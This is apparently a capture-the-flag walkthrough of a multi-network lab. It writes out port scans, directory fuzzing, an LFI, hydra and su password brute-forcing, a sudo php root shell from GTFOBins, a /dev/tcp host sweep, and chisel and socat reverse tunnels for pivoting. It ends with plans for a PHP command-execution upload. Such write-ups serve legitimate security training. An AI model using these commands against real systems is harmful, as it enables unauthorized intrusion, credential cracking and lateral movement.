-
I start scaning the open ports
nmap -p- -vvv -sS --min-rate 5000 -Pn 10.10.10.2 -oG scan
-
Scanning open ports
nmap -p22,80 -sCV 10.10.10.2 -oN ports
-
We enter the website
-
We check the technologies being used by the web application
-
We perform fuzzing to try to find directories
gobuster dir -u http://10.10.10.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
-
I access the website http://10.10.10.2/shop/
-
It seems that the web page has a parameter with which I can try to load a local file (LFI)
-
With the absolute path it does not load anything. When trying with relative paths I managed to load files
- I discovered two users,
seller and manchi. I make a brute force attack to try to connect via ssh with one of these users
-
With the user seller I could not get his password but I could with manchi
hydra -l manchi -P /usr/share/wordlist/rockyou.txt ssh://10.10.10.2
-
I try to connected via ssh and after searching for a while for ways to escalate our privileges but I don´t found nothing. I tried to brute force with the user seller
Sudo_BruteForce
./Linux-Su-Force.sh seller rockyou.txt
-
I connect as seller and list the commands that I can execute as sudo without providing a password
-
I search in gtfobins for ways to escalate privileges with sudo php and become root
GTFOBins
CMD="/bin/sh"
sudo php -r "system('$CMD');"
-
I find out which ips this computer has ‘hostname -I’. I apply a reconnaissance to see what other hosts are on network 20.20.20.0/24
#!/bin/bash
for i in $(seq 1 254); do
for port in 21 22 80 443 445 8080; do
timeout 1 bash -c "echo '' > /dev/tcp/20.20.20.$i/$port" &>/dev/null && echo "[+] Host 20.20.20.$i - PORT $port - OPEN" &
done
done; wait
-
I create a tunnel between the two machines using chisel
#Execute this from your machine
./chisel server --reverse -p 1234
#Execute this from the 10.10.10.2 machine
./chisel client 10.10.10.1:1234 R:1080:socks
-
As we see that you have a web service on port 80, we perform an enumeration and find a secret.php file.
gobuster dir -u http://20.20.20.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1080 -t 5 -x .php,.txt
-
We access the page defining a proxy and see a potential user
-
We make a brute force attack to try to connect via ssh
proxychains4 hydra -l mario -P /usr/share/wordlist/rockyou.txt ssh://20.20.20.3 2>/dev/null
-
I connect via ssh and see what commands you can execute as sudo without providing a password
-
I search in gtfobins for ways to escalate privileges with sudo vim and become root
-
I find out which ips this computer has ‘hostname -I’. I apply a reconnaissance to see what other hosts are on network 30.30.30.0/24
-
I create a tunnel between the three machines using chisel and socat
./chisel client 20.20.20.2:4237 R:8888:socks
./socat TCP-LISTEN:4237,fork TCP:10.10.10.1:1234
-
I scanned the 5000 most common ports and found port 80 open.
nmap -sT -Pn --top-ports 5000 -open- --min-rate 5000 -vvv -n 30.30.30.3 2>/dev/null
-
I try to upload a php file with which I can execute commands (RCE)
